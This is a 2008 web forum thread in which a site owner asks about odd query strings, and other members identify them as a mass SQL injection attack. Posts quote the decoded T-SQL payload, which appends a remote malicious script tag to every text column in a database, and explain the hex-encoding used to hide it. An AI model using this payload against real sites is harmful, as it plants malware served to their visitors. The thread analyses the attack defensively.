I'm puzzled as to why someone is accessing the site by adding the http bit to the normal url. There are a few of these and they are all different.
<
Replies ...
Podge
02 February 2008, 09:07
Maybe they are redirecting traffic and are trying to mask the destination? A bit like the way spammers use tinyurl ?<
Mr Pink
02 February 2008, 09:31
Hi Podge
The link doesn't redirect, it just displays the page in the normal way.<
Podge
02 February 2008, 09:43
I don't know what they are doing then. Is this the url - http:/www.fabcraft.co.uk/forum/lovuqo/zil/&page=402<
MarcelG
02 February 2008, 09:49
THey may be trying to pass wrong values to your code, in an effort to hack your site.
I've seen similar attempts on oxle.com, where they try to insert PHP scripts....with no succes of course.<
Mr Pink
02 February 2008, 10:05
That's one of the sites. I think they are all the same people though
I have been getting more spam on my guestbook recently. It seems to come in waves, it will be quiet for a few months then lots of activity.
<
Mr Pink
04 March 2008, 15:47
Today I found this. Looks like a new method of doing something, but what is it?
default.asp?id=0&ACT=7&page=17 Result: using proxy 97.81.19.227:8080;GET-timeouts 2;POST-timeouts 1;chosen nickname "frontivillete";captcha recognized;sent;&<
Does anyone know what the above inserted into a url will do?
<
AnonJr
13 May 2008, 09:18
Off the top of my head it looks like its trying to inject some SQL, but I couldn't say for sure what its specifically trying to do. If you sanitize your query strings properly I don't think its anything to worry about. But I'd get a second opinion on that. <
Podge
13 May 2008, 09:24
Its part of a mass sql injection attack - http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
This looks a little complicated but, if we remove the encoding, we get this:
DECLARE @S NVARCHAR(4000); SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000)); EXEC(@S);--
So, here's what this little bit of T-SQL is doing:
Declaring a variable, S, as an NVARCHAR. For those of us who don't speak T-SQL natively, think of this as a string. Taking a long hex value (I took out a few hundred characters where the ... is there) that is really a Unicode string(1) and casting it as NVARCHAR. In other words, we're taking this hex representation of a string and turning it into a real string. Once that's done, we execute that string as a T-SQL statement. So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
This one is a little more complicated but it does something like this:
Declare a few variables that are used later. Do a SQL query on the sysobjects and syscolumns tables. This is some serious mojo as these tables contain a list of ALL the tables and ALL the columns in the database. What this query is looking for is every column in the entire database with a type that contains strings. Now, we're going to loop through all of those columns and, in every one of them... ...we're going to append the <script>...</script> text. Finally, clean up and we're done. Now that this has run, every bit of text in your database has this malicious script tag appended to it. If you're using that database to contain text/HTML that you're going to insert into your webpages and display to your users, you are now serving up a malicious script to every one of your trusting customers.
<
Podge
13 May 2008, 09:29
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE
Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.
http://www.string-functions.com/hex-string.aspx<
AnonJr
13 May 2008, 10:06
I just learned something new. I would have never thought of someone encoding the string like that.
Thanks for that Podge. <
Podge
13 May 2008, 10:17
Its nothing new. Hackers are always trying to disguise what they are doing.
I heard about it from SSWUG a few weeks ago - http://www.sswug.org<
Mr Pink
13 May 2008, 10:48
Originally posted by Podge 0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE
Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.
http://www.string-functions.com/hex-string.aspx
There is my own url on the end of it, that's all<
Podge
13 May 2008, 11:24
It doesn't look like there a lot of support for FullXml anymore. You might want to ask if there are any security issues on their forum - http://sourceforge.net/forum/forum.php?forum_id=118410<
Mr Pink
13 May 2008, 13:32
Thanks for the information about the script Podge. Very interesting.
I've been trying to get support for months and have decided to change to another package.<
Podge
13 May 2008, 14:50
No problem. If its a CMS you're after then try Umbraco.<
Mr Pink
14 May 2008, 07:37
There was another attempt today. I posted the string into the convertor and it came up with this
?DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.direct84.com/7.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
<
AnonJr
14 May 2008, 08:15
Persistant buggers.<
Podge
14 May 2008, 08:18
Thats nasty. The query inserts a javascript into every text type column in your database.<
Astralis
14 May 2008, 12:12
That's exactly what happened to me. How did they get in? How to stop this??<
Podge
14 May 2008, 12:27
You need to sanitise all user input. Lots of stuff on Google<
<
<